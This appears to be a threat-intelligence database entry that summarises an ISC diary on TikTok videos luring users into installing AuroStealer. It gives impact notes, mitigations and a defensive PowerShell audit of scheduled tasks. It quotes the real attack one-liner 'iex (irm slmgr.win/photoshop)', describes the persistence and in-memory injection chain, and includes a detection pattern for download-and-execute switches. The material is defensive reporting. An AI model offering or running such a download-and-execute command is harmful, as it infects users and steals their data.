TikTok Videos Promoting Malware Installation, (Fri, Oct 17th)
Attackers are everywhere! They try to abuse victims using new communication channels and social engineering techniques! Somebody pointed me to the following TikTok video: hxxps://vm[.]tiktok[.]com/ZGdaCkbEF/.
AI Analysis
Technical Summary
This threat involves a social engineering campaign leveraging TikTok videos that promote malware installation by enticing victims with offers such as free activation of Photoshop. The attacker posts videos containing instructions to run a PowerShell one-liner command with administrator privileges: iex (irm slmgr.win/photoshop). This command downloads and executes a malicious PowerShell script (SHA256: 6D897B56...) which subsequently downloads a second-stage payload, updater.exe (SHA256: 58b11b4dc8...), identified as AuroStealer, a known information-stealing malware. Persistence is achieved by registering scheduled tasks with names mimicking legitimate update tasks (e.g., MicrosoftEdgeUpdateTaskMachineCore, GoogleUpdateTaskMachineCore) that execute the malicious PowerShell script at user logon with highest privileges. A third payload, source.exe (SHA256: db57e4a73d3...), is downloaded and executed; it dynamically compiles code on the victim's machine using the .NET compiler (csc.exe) to inject shellcode directly into memory, a technique designed to evade traditional file-based detection. This multi-stage infection chain relies heavily on social engineering via TikTok videos, exploiting user trust in popular software and social media platforms. The campaign is reminiscent of the ClickFix attack scenario, emphasizing the risk of executing untrusted scripts from social media sources. Although no known exploits are in the wild beyond the social engineering vector, the malware's capabilities include persistence, data theft, and stealthy code injection. The campaign is currently rated as low severity but has potential for escalation if combined with further exploitation or lateral movement techniques.
Potential Impact
For European organizations, this threat poses a risk primarily through user-targeted social engineering attacks that can lead to credential theft, data exfiltration, and potential footholds for further network compromise. The use of scheduled tasks for persistence and in-memory shellcode injection complicates detection and removal, increasing the risk of prolonged undetected presence. Organizations with employees who use social media platforms like TikTok, especially younger or less security-aware users, are at higher risk. The malware's ability to steal information (via AuroStealer) can lead to confidentiality breaches affecting sensitive corporate or personal data. Additionally, the dynamic compilation and execution of code on endpoints may bypass traditional antivirus solutions, increasing the likelihood of successful infection. While the initial infection requires user interaction, the widespread popularity of TikTok and the lure of free software activation could lead to significant infection rates. This can disrupt business operations, damage reputation, and incur regulatory penalties under GDPR if personal data is compromised.
Mitigation Recommendations
1. Conduct targeted user awareness training focusing on the risks of executing commands or scripts from untrusted social media sources, emphasizing skepticism towards offers of free software activation.
2. Implement application control policies (e.g., Windows AppLocker or Microsoft Defender Application Control) to restrict execution of unauthorized PowerShell scripts and block the use of csc.exe for unapproved compilation tasks.
3. Monitor and audit scheduled tasks for suspicious names or creation patterns, especially those mimicking legitimate update tasks but created recently or by non-administrative users.
4. Deploy endpoint detection and response (EDR) solutions capable of detecting in-memory code injection and anomalous PowerShell activity with execution policy bypass.
5. Restrict PowerShell execution policies to disallow scripts from untrusted sources and enable logging of all PowerShell commands for forensic analysis.
6. Use network filtering to block access to known malicious domains and URLs associated with the campaign (e.g., slmgr.win, file-epq.pages.dev).
7. Regularly update and patch endpoint security tools to detect emerging malware variants like AuroStealer.
8. Encourage reporting and rapid incident response to suspected infections to contain lateral movement and data exfiltration.
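An added PowerShell audit in the spirit of recommendation 3 (example code written for this page, not from the ISC diary or the analysis above): it lists scheduled tasks whose name resembles a vendor update task but whose action launches a script host, carries download/eval or policy-bypass switches, or runs a binary outside the usual install roots. The name pattern, the allowed roots, the switch regex and the two-indicator threshold are assumptions chosen for illustration.

```powershell
# Added example (not from the ISC diary or this page): flag scheduled tasks whose name
# imitates a vendor update task but whose action looks like script-based persistence.
# Assumptions: the name pattern, allowed roots, switch regex and two-indicator threshold.
# Run in an elevated Windows PowerShell 5.1 or PowerShell 7 session.

$NamePattern  = 'Update.*Task'   # e.g. MicrosoftEdgeUpdateTaskMachineCore, GoogleUpdateTaskMachineCore
$AllowedRoots = @($env:ProgramFiles, ${env:ProgramFiles(x86)}, "$env:SystemRoot\System32") |
                Where-Object { $_ }      # drop nulls (no ProgramFiles(x86) on 32-bit hosts)
$ShellNames   = 'powershell.exe', 'pwsh.exe', 'cmd.exe', 'wscript.exe', 'mshta.exe'
$ArgPattern   = '\b(iex|irm|Invoke-Expression|Invoke-RestMethod|DownloadString|FromBase64String)\b' +
                '|-(ExecutionPolicy|ep)\s+Bypass|-(EncodedCommand|enc?)\b|-w(indowstyle)?\s+hidden'

function Get-SuspiciousUpdateTask {
    Get-ScheduledTask | Where-Object { $_.TaskName -match $NamePattern } | ForEach-Object {
        $task = $_
        foreach ($action in $task.Actions) {
            $exe       = [string]$action.Execute      # empty for non-Exec (COM handler) actions
            $argString = [string]$action.Arguments
            $expanded  = [Environment]::ExpandEnvironmentVariables($exe)
            $exeName   = [System.IO.Path]::GetFileName($expanded).ToLowerInvariant()

            $reasons = @()
            if ($exeName -in $ShellNames)    { $reasons += "action launches $exeName" }
            if ($argString -match $ArgPattern) { $reasons += 'download/eval or bypass switches in arguments' }
            if ($exe -and -not ($AllowedRoots | Where-Object { $expanded.StartsWith($_, 'OrdinalIgnoreCase') })) {
                $reasons += "binary outside allowed roots: $expanded"
            }
            if ($task.Principal.RunLevel -eq 'Highest') { $reasons += 'runs with highest privileges' }

            # Genuine update tasks usually trip at most one indicator (elevated run level),
            # so require two or more to keep the output actionable.
            if ($reasons.Count -ge 2) {
                [pscustomobject]@{
                    TaskName   = $task.TaskName
                    TaskPath   = $task.TaskPath
                    Author     = $task.Author
                    Registered = $task.Date
                    Execute    = $exe
                    Arguments  = $argString
                    Reasons    = $reasons -join '; '
                }
            }
        }
    }
}

Get-SuspiciousUpdateTask | Format-List
```

Tasks that are flagged should be compared against the installed vendor software and, where no such product exists, exported with `Export-ScheduledTask` for the incident record before removal.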
Affected Countries
United Kingdom, Germany, France, Italy, Spain, Netherlands, Poland, Sweden
Technical Details
- Article Source: https://isc.sans.edu/diary/rss/32380 (fetched 2025-10-17T07:46:32Z, 533 words)
- Threat ID: 68f1f4589c34d0947f07f3c0
- Added to database: 10/17/2025, 7:46:32 AM
- Last enriched: 10/17/2025, 7:46:48 AM
- Last updated: 10/19/2025, 12:37:48 PM